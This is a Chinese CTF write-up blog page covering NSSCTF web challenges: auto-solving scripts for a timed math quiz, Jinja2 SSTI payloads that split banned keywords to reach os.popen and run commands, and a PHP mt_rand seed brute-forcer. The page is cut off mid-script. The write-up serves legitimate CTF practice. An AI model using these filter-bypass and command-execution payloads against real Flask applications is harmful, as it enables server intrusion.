
<!DOCTYPE html>
<html lang="zh-CN">
    <head>
        <meta charset="UTF-8" />
        <title>NSSCTF web 刷题记录2 | 雲流のLowest World</title>
        <meta name="author" content="C1oudfL0w0" />
        <meta name="description" content="" />
        <meta name="keywords" content="" />
        <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0" />
        <link rel="icon" href="/blog/images/croppedImage_cropped.jpg" />
        <script src="https://cdn.staticfile.org/vue/3.2.45/vue.global.prod.min.js"></script>
<link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/6.2.1/css/all.min.css" />
<link rel="stylesheet" href="/blog/css/fonts.min.css" />
<link rel="stylesheet" href="/blog/css/search.css" />
<script> const mixins = {}; </script>

<script src="https://polyfill.io/v3/polyfill.min.js?features=default"></script>

<!--改成了prismjs高亮-->

<script src="/blog/js/lib/prism.js"></script>
<link rel="stylesheet" href="/blog/css/prism.css" rel="stylesheet" />



<script src="/blog/js/lib/preview.js"></script>










<script src="/blog/js/lib/home.js"></script>

<link rel="stylesheet" href="/blog/css/main.css" />
<!-- 引入jQuery-->
<script type="text/javascript" src="https://apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script>
<!-- 引入不蒜子-->
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

    
        <script type="text/javascript" src="/blog/libs/codeBlock/codeBlockFuction.js"></script>
<!-- 代码语言 -->
<script type="text/javascript" src="/blog/libs/codeBlock/codeLang.js"></script>
<!-- 代码块复制 -->
<!-- 引入clipboard -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.8/clipboard.min.js"></script>
<script type="text/javascript" src="/blog/libs/codeBlock/codeCopy.js"></script>
<!-- 代码块收缩 -->
<script type="text/javascript" src="/blog/libs/codeBlock/codeShrink.js"></script> 
<!-- 代码块折行 -->
<style type="text/css">code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }</style>
    <meta name="generator" content="Hexo 6.3.0"></head>
    <body>
        <!--flag{never_g0nna g1ve_you up}-->

        <!-- 页面点击小红心与文字 -->
        <script type = "text/javascript" src = "/blog/js/love-click.js"></script>

        <!-- 浏览器标题 -->
         <script type="text/javascript" src="/blog/js/FunnyTitle.js"></script>
         
        <!--动态背景-->
        <script type="text/javascript"
        color="0,0,255" opacity='0.7' zIndex="-2" count="99" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>

        <!--文章目录-->
        
    <div id="toc" class="toc-article">
    <h3><i class="fa-brands fa-readme"></i>  目录</h3>
      <div class="toc-title"></div>
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#HUBUCTF-2022-%E6%96%B0%E7%94%9F%E8%B5%9B-Calculate"><span class="toc-text">[HUBUCTF 2022 新生赛]Calculate</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#NCTF-2018-Flask-PLUS"><span class="toc-text">[NCTF 2018]Flask PLUS</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#GWCTF-2019-%E6%9E%AF%E7%87%A5%E7%9A%84%E6%8A%BD%E5%A5%96"><span class="toc-text">[GWCTF 2019]枯燥的抽奖</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#FSCTF-2023-%E6%BA%90%E7%A0%81%EF%BC%81%E5%90%AF%E5%8A%A8"><span class="toc-text">[FSCTF 2023]源码！启动!</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#NSSCTF-2022-Spring-Recruit-babysql"><span class="toc-text">[NSSCTF 2022 Spring Recruit]babysql</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%BD%91%E9%BC%8E%E6%9D%AF-2018-Fakebook"><span class="toc-text">[网鼎杯 2018]Fakebook</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#FSCTF-2023-webshell%E6%98%AF%E5%95%A5%E6%8D%8F"><span class="toc-text">[FSCTF 2023]webshell是啥捏</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%BE%8A%E5%9F%8E%E6%9D%AF-2020-easyphp"><span class="toc-text">[羊城杯 2020]easyphp</span></a></li></ol>
    </div>
  
        
        <!--返回顶部-->
        <div id="totop" style="position:fixed;bottom:50px;right:60px;font-size: 48px;cursor: pointer;z-index: 10;">
            <a title="返回顶部">↑</a>
            </div>
        <script src="/blog/js/totop.js"></script>

        <div id="layout">
            <transition name="fade">
            <div id="loading" v-show="loading">
                <div id="loading-circle">
                    <h2>LOADING</h2>
                    <p>第一次加载文章图片可能会花费较长时间</p>
                    <p>要不挂个梯子试试？（x</p>
                    <p>加载过慢请开启缓存&ensp;浏览器默认开启</p>
                    <img src="/blog/images/loading.gif" />
                </div>
            </div>
            </transition>
            <transition name="into">
            <div id="main" v-show="!loading">
                <nav id="menu" ref="menu">
    <div class="desktop-menu">
        <a class="title" href="/blog/">
            <span>雲流のLOWEST WORLD</span>
        </a>
        
        <a href="/blog/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/blog/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;About</span>
        </a>
        
        <a href="/blog/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;Archives</span>
        </a>
        
        <a href="/blog/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;Categories</span>
        </a>
        
        <a href="/blog/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;Tags</span>
        </a>
        
        <a href="/blog/links">
            <i class="fa-solid fa-link fa-fw"></i>
            <span>&ensp;Links</span>
        </a>
        
        <a href="/blog/search">
            <i class="fa-solid fa-search fa-fw"></i>
            <span>&ensp;Search</span>
        </a>
        
    </div>
    <div id="mobile-menu">
        <div class="curtain" v-show="showMenu" @click="showMenu = !showMenu"></div>
        <div class="title" @click="showMenu = !showMenu">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;雲流のLOWEST WORLD</span>
        </div>
        <transition name="slide">
        <div class="items" v-show="showMenu">
            
            <a href="/blog/">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-house fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                </div>
            </a>
            
            <a href="/blog/about">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-id-card fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">About</div>
                </div>
            </a>
            
            <a href="/blog/archives">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-box-archive fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Archives</div>
                </div>
            </a>
            
            <a href="/blog/categories">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-bookmark fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Categories</div>
                </div>
            </a>
            
            <a href="/blog/tags">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-tags fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Tags</div>
                </div>
            </a>
            
            <a href="/blog/links">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-link fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Links</div>
                </div>
            </a>
            
            <a href="/blog/search">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-search fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Search</div>
                </div>
            </a>
            
        </div>
        </transition>
    </div>
</nav>

                <div class="article">
    <div>
        <h1>NSSCTF web 刷题记录2</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2023/11/3
        </span>
        
        <span class="category">
            <a href="/blog/categories/Web/">
                <span class="icon">
                    <i class="fa-solid fa-bookmark fa-fw"></i>
                </span>
                Web
            </a>
        </span>
        
        
        <span class="tags">
            <span class="icon">
                <i class="fa-solid fa-tags fa-fw"></i>
            </span>
            
            <span class="tag">
                
                <a href="/blog/tags/%E5%88%B7%E9%A2%98/" style="color: #ffa2c4">刷题</a>
            </span>
            
        </span>
        
        <!--文章字数统计-->
        
            
<div style="margin-top:10px;">
    <span class="post-time">
      <span class="post-meta-item-icon">
        <i class="fa fa-keyboard-o"></i>
        <span class="post-meta-item-text">  字数统计: </span>
        <!-- 安装插件npm install hexo-wordcount --save -->
        <span class="post-count">2.3k字</span>
      </span>
    </span>

    <span class="post-time">
      &nbsp; | &nbsp;
      <span class="post-meta-item-icon">
        <i class="fa fa-hourglass-half"></i>
        <span class="post-meta-item-text">  阅读时长: </span>
        <span class="post-count">10分</span>
      </span>
    </span>
    
    <!--不蒜子统计访问数-->
    <span id="busuanzi_container_page_pv">
    &nbsp; | &nbsp;
    总文章阅读量：<span id="busuanzi_value_page_pv"></span>次
    </span>
</div>

          
    </div>
    
    <div class="content" v-pre>
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>第二回合，开始web第11页和第12页</p>
<span id="more"></span>

<h1 id="HUBUCTF-2022-新生赛-Calculate"><a href="#HUBUCTF-2022-新生赛-Calculate" class="headerlink" title="[HUBUCTF 2022 新生赛]Calculate"></a>[HUBUCTF 2022 新生赛]Calculate</h1><blockquote>
<p>python脚本</p>
</blockquote>
<p>进入题目，是经典速算题：</p>
<p>回答以下数学问题20次；你有3秒钟的时间来解决每个问题；为了保护服务器，你不能在1秒内回答一个问题</p>
<p>编写脚本，注意每次提交都要更新cookie</p>
<p>思路比较完整的wp：<a target="_blank" rel="noopener" href="https://www.nssctf.cn/note/set/443">https://www.nssctf.cn/note/set/443</a></p>
<p>要我自己搓脚本还是太困难了555，这里收集一点脚本以后改一改用算了（</p>
<p>常规脚本：</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> time
<span class="token keyword">import</span> requests
<span class="token keyword">import</span> re

url <span class="token operator">=</span> <span class="token string">'http://node5.anna.nssctf.cn:28311/'</span>
s <span class="token operator">=</span> requests<span class="token punctuation">.</span>Session<span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token keyword">for</span> x <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span><span class="token number">20</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    res <span class="token operator">=</span> s<span class="token punctuation">.</span>get<span class="token punctuation">(</span>url<span class="token operator">=</span>url<span class="token punctuation">)</span>
    my_text <span class="token operator">=</span> re<span class="token punctuation">.</span>findall<span class="token punctuation">(</span><span class="token string">r">[\d|\-|+|*]&lt;"</span><span class="token punctuation">,</span>res<span class="token punctuation">.</span>text<span class="token punctuation">)</span>
    strings <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">'0'</span><span class="token punctuation">,</span><span class="token string">'1'</span><span class="token punctuation">,</span><span class="token string">'2'</span><span class="token punctuation">,</span><span class="token string">'3'</span><span class="token punctuation">,</span><span class="token string">'4'</span><span class="token punctuation">,</span><span class="token string">'5'</span><span class="token punctuation">,</span><span class="token string">'6'</span><span class="token punctuation">,</span><span class="token string">'7'</span><span class="token punctuation">,</span><span class="token string">'8'</span><span class="token punctuation">,</span><span class="token string">'9'</span><span class="token punctuation">,</span><span class="token string">'+'</span><span class="token punctuation">,</span><span class="token string">'-'</span><span class="token punctuation">,</span><span class="token string">'*'</span><span class="token punctuation">]</span>
    num <span class="token operator">=</span> <span class="token string">''</span>
    <span class="token keyword">for</span> i <span class="token keyword">in</span> my_text<span class="token punctuation">:</span>
        <span class="token keyword">for</span> j <span class="token keyword">in</span> strings<span class="token punctuation">:</span>
            <span class="token keyword">if</span> j <span class="token keyword">in</span> i<span class="token punctuation">:</span>
                num <span class="token operator">+=</span> <span class="token builtin">str</span><span class="token punctuation">(</span>j<span class="token punctuation">)</span>
    result <span class="token operator">=</span> <span class="token builtin">eval</span><span class="token punctuation">(</span>num<span class="token punctuation">)</span>
    data <span class="token operator">=</span> <span class="token punctuation">&#123;</span>
        <span class="token string">'ans'</span><span class="token punctuation">:</span>result
    <span class="token punctuation">&#125;</span>
    time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1.5</span><span class="token punctuation">)</span>
    res1 <span class="token operator">=</span> s<span class="token punctuation">.</span>post<span class="token punctuation">(</span>url<span class="token operator">=</span>url<span class="token punctuation">,</span>data<span class="token operator">=</span>data<span class="token punctuation">)</span>
    <span class="token keyword">if</span> <span class="token string">'calculate error!'</span> <span class="token keyword">in</span> res1<span class="token punctuation">.</span>text<span class="token punctuation">:</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span>res<span class="token punctuation">.</span>text<span class="token punctuation">)</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span>my_text<span class="token punctuation">)</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>num<span class="token punctuation">)</span><span class="token operator">+</span><span class="token string">'='</span><span class="token operator">+</span><span class="token builtin">str</span><span class="token punctuation">(</span>result<span class="token punctuation">)</span><span class="token punctuation">)</span>
        <span class="token keyword">break</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>res1<span class="token punctuation">.</span>text<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>BeautifulSoup库写的爬虫脚本</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> bs4 <span class="token keyword">import</span> BeautifulSoup
<span class="token keyword">import</span> requests
<span class="token keyword">import</span> time

url <span class="token operator">=</span> <span class="token string">'http://node5.anna.nssctf.cn:28311/'</span>
s <span class="token operator">=</span> requests<span class="token punctuation">.</span>Session<span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span><span class="token number">20</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    res1 <span class="token operator">=</span> s<span class="token punctuation">.</span>get<span class="token punctuation">(</span>url<span class="token operator">=</span>url<span class="token punctuation">)</span>
    soup <span class="token operator">=</span> BeautifulSoup<span class="token punctuation">(</span>res1<span class="token punctuation">.</span>text<span class="token punctuation">,</span><span class="token string">'html.parser'</span><span class="token punctuation">)</span>
    tags <span class="token operator">=</span> soup<span class="token punctuation">.</span>find_all<span class="token punctuation">(</span><span class="token string">'div'</span><span class="token punctuation">)</span>	<span class="token comment"># 找算式所在的div标签</span>
    cal <span class="token operator">=</span> <span class="token string">''</span>
    <span class="token keyword">for</span> tag <span class="token keyword">in</span> tags<span class="token punctuation">:</span>
        cal <span class="token operator">+=</span> tag<span class="token punctuation">.</span>text
    cal <span class="token operator">=</span> cal<span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span>	<span class="token comment"># 最后一个等号不参与计算</span>
    num <span class="token operator">=</span> <span class="token builtin">eval</span><span class="token punctuation">(</span>cal<span class="token punctuation">)</span>
    data<span class="token operator">=</span><span class="token punctuation">&#123;</span>
        <span class="token string">'ans'</span><span class="token punctuation">:</span>num
    <span class="token punctuation">&#125;</span>
    time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
    res2 <span class="token operator">=</span> s<span class="token punctuation">.</span>post<span class="token punctuation">(</span>url<span class="token operator">=</span>url<span class="token punctuation">,</span>data<span class="token operator">=</span>data<span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>res2<span class="token punctuation">.</span>text<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>Xpath的脚本</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> time

<span class="token keyword">import</span> requests
<span class="token keyword">from</span> lxml <span class="token keyword">import</span> etree

url <span class="token operator">=</span> <span class="token string">"http://node5.anna.nssctf.cn:28311/"</span>
res1 <span class="token operator">=</span> requests<span class="token punctuation">.</span>session<span class="token punctuation">(</span><span class="token punctuation">)</span>

<span class="token keyword">while</span> <span class="token boolean">True</span><span class="token punctuation">:</span>
    res <span class="token operator">=</span> res1<span class="token punctuation">.</span>get<span class="token punctuation">(</span>url<span class="token punctuation">)</span>
    tree <span class="token operator">=</span> etree<span class="token punctuation">.</span>HTML<span class="token punctuation">(</span>res<span class="token punctuation">.</span>text<span class="token punctuation">)</span>
    concat <span class="token operator">=</span> <span class="token string">''</span>
    divs <span class="token operator">=</span> tree<span class="token punctuation">.</span>xpath<span class="token punctuation">(</span><span class="token string">'/html/body/form/div/text()'</span><span class="token punctuation">)</span>
    <span class="token keyword">del</span> divs<span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span>
    ans <span class="token operator">=</span> concat<span class="token punctuation">.</span>join<span class="token punctuation">(</span>divs<span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>ans<span class="token punctuation">)</span>
    result <span class="token operator">=</span> <span class="token builtin">str</span><span class="token punctuation">(</span><span class="token builtin">eval</span><span class="token punctuation">(</span>ans<span class="token punctuation">)</span><span class="token punctuation">)</span>
    time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
    resp <span class="token operator">=</span> res1<span class="token punctuation">.</span>post<span class="token punctuation">(</span>url<span class="token operator">=</span>url<span class="token punctuation">,</span> data<span class="token operator">=</span><span class="token punctuation">&#123;</span><span class="token string">"ans"</span><span class="token punctuation">:</span> result<span class="token punctuation">&#125;</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>result<span class="token punctuation">)</span>
    cnt <span class="token operator">=</span> tree<span class="token punctuation">.</span>xpath<span class="token punctuation">(</span><span class="token string">'/html/body/p[3]/text()'</span><span class="token punctuation">)</span>
    count <span class="token operator">=</span> concat<span class="token punctuation">.</span>join<span class="token punctuation">(</span>cnt<span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"cnt=====>"</span><span class="token punctuation">,</span> count<span class="token punctuation">)</span>
    <span class="token keyword">if</span> <span class="token string">"NSS"</span> <span class="token keyword">in</span> resp<span class="token punctuation">.</span>text<span class="token punctuation">:</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span>resp<span class="token punctuation">.</span>text<span class="token punctuation">)</span>
        <span class="token keyword">break</span>
    time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<hr>
<h1 id="NCTF-2018-Flask-PLUS"><a href="#NCTF-2018-Flask-PLUS" class="headerlink" title="[NCTF 2018]Flask PLUS"></a>[NCTF 2018]Flask PLUS</h1><blockquote>
<p>ssti</p>
</blockquote>
<p>注入点还是在路由处，fuzz一下，发现ban了os，request，popen，class，mro，subclasses，<code>__init__</code>，subprocess，join</p>
<p>关键字用拼接绕过，直接找<code>&lt;class &#39;os._wrap_close&#39;&gt;</code>类</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token punctuation">&#123;</span><span class="token punctuation">&#123;</span><span class="token string">""</span><span class="token punctuation">[</span><span class="token string">'__cla'</span><span class="token string">'ss__'</span><span class="token punctuation">]</span><span class="token punctuation">.</span>__bases__<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">'__subcla'</span><span class="token string">'sses__'</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">137</span><span class="token punctuation">]</span><span class="token punctuation">&#125;</span><span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><code>__init__</code>没了可以用<code>__enter__</code>或者<code>__exit__</code>代替，命令执行即可</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token punctuation">&#123;</span><span class="token punctuation">&#123;</span><span class="token string">''</span><span class="token punctuation">[</span><span class="token string">'__cla'</span><span class="token string">'ss__'</span><span class="token punctuation">]</span><span class="token punctuation">.</span>__bases__<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">'__subcla'</span><span class="token string">'sses__'</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">137</span><span class="token punctuation">]</span><span class="token punctuation">.</span>__enter__<span class="token punctuation">.</span>__globals__<span class="token punctuation">[</span><span class="token string">'pop'</span><span class="token string">'en'</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">'ls /'</span><span class="token punctuation">)</span><span class="token punctuation">.</span>read<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#125;</span><span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<hr>
<h1 id="GWCTF-2019-枯燥的抽奖"><a href="#GWCTF-2019-枯燥的抽奖" class="headerlink" title="[GWCTF 2019]枯燥的抽奖"></a>[GWCTF 2019]枯燥的抽奖</h1><blockquote>
<p>php伪随机数预测</p>
</blockquote>
<p>进入题目，抓包发现check.php</p>
<p><img src="/blog/2023/11/03/NSSCTF-web-%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%952/image-20231105102425506.png" alt="image-20231105102425506"></p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token comment">#这不是抽奖程序的源代码！不许看！</span>
<span class="token function">header</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"Content-Type: text/html;charset=utf-8"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">session_start</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token operator">!</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_SESSION</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'seed'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
<span class="token variable">$_SESSION</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'seed'</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token function">rand</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span><span class="token number">999999999</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token function">mt_srand</span><span class="token punctuation">(</span><span class="token variable">$_SESSION</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'seed'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$str_long1</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"</span><span class="token punctuation">;</span>
<span class="token variable">$str</span><span class="token operator">=</span><span class="token string single-quoted-string">''</span><span class="token punctuation">;</span>
<span class="token variable">$len1</span><span class="token operator">=</span><span class="token number">20</span><span class="token punctuation">;</span>
<span class="token keyword">for</span> <span class="token punctuation">(</span> <span class="token variable">$i</span> <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> <span class="token variable">$i</span> <span class="token operator">&lt;</span> <span class="token variable">$len1</span><span class="token punctuation">;</span> <span class="token variable">$i</span><span class="token operator">++</span> <span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
    <span class="token variable">$str</span><span class="token operator">.=</span><span class="token function">substr</span><span class="token punctuation">(</span><span class="token variable">$str_long1</span><span class="token punctuation">,</span> <span class="token function">mt_rand</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> <span class="token function">strlen</span><span class="token punctuation">(</span><span class="token variable">$str_long1</span><span class="token punctuation">)</span> <span class="token operator">-</span> <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>       
<span class="token punctuation">&#125;</span>
<span class="token variable">$str_show</span> <span class="token operator">=</span> <span class="token function">substr</span><span class="token punctuation">(</span><span class="token variable">$str</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token number">10</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token string double-quoted-string">"&lt;p id='p1'>"</span><span class="token operator">.</span><span class="token variable">$str_show</span><span class="token operator">.</span><span class="token string double-quoted-string">"&lt;/p>"</span><span class="token punctuation">;</span>


<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'num'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'num'</span><span class="token punctuation">]</span><span class="token operator">===</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token keyword">echo</span> <span class="token string double-quoted-string">"&lt;p id=flag>抽奖，就是那么枯燥且无味，给你flag&#123;xxxxxxxxx&#125;&lt;/p>"</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">else</span><span class="token punctuation">&#123;</span>
        <span class="token keyword">echo</span> <span class="token string double-quoted-string">"&lt;p id=flag>没抽中哦，再试试吧&lt;/p>"</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>
<span class="token function">show_source</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"check.php"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> </span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>这题的意思是生成了20位的随机字符串，先给了我们前10位随机字符串，要我们把整串字符串提交上去</p>
<p>用了<code>mt_srand</code>生成伪随机数，很明显存在伪随机数预测漏洞</p>
<p>把核心逻辑copy出来然后写php脚本爆破种子，然后生成我们需要的字符串即可</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$str_long1</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"</span><span class="token punctuation">;</span>
<span class="token variable">$len1</span> <span class="token operator">=</span> <span class="token number">20</span><span class="token punctuation">;</span>
<span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token variable">$n</span> <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> <span class="token variable">$n</span> <span class="token operator">&lt;=</span> <span class="token number">999999999</span><span class="token punctuation">;</span> <span class="token variable">$n</span><span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token variable">$str</span> <span class="token operator">=</span> <span class="token string single-quoted-string">''</span><span class="token punctuation">;</span>
    <span class="token function">mt_srand</span><span class="token punctuation">(</span><span class="token variable">$n</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token variable">$i</span> <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> <span class="token variable">$i</span> <span class="token operator">&lt;</span> <span class="token variable">$len1</span><span class="token punctuation">;</span> <span class="token variable">$i</span><span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token variable">$str</span> <span class="token operator">.=</span> <span class="token function">substr</span><span class="token punctuation">(</span><span class="token variable">$str_long1</span><span class="token punctuation">,</span> <span class="token function">mt_rand</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> <span class="token function">strlen</span><span class="token punctuation">(</span><span class="token variable">$str_long1</span><span class="token punctuation">)</span> <span class="token operator">-</span> <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
